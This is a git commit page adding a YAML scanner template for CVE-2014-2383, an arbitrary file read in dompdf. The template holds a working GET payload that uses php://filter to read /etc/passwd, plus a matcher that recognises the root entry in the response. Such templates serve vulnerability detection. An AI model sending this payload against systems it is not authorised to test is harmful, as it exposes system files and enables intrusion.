Create CVE-2014-2383.yaml

patch-1
Roberto Nunes 2021-06-10 18:45:21 +09:00 committed by GitHub
parent 8be097abf5
commit ee3900e837
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
CVE-2014-2383.yaml Normal file
View File

@ -0,0 +1,24 @@
id: arbitrary-file-read-in-dompdf
info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
tags: dompdf,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200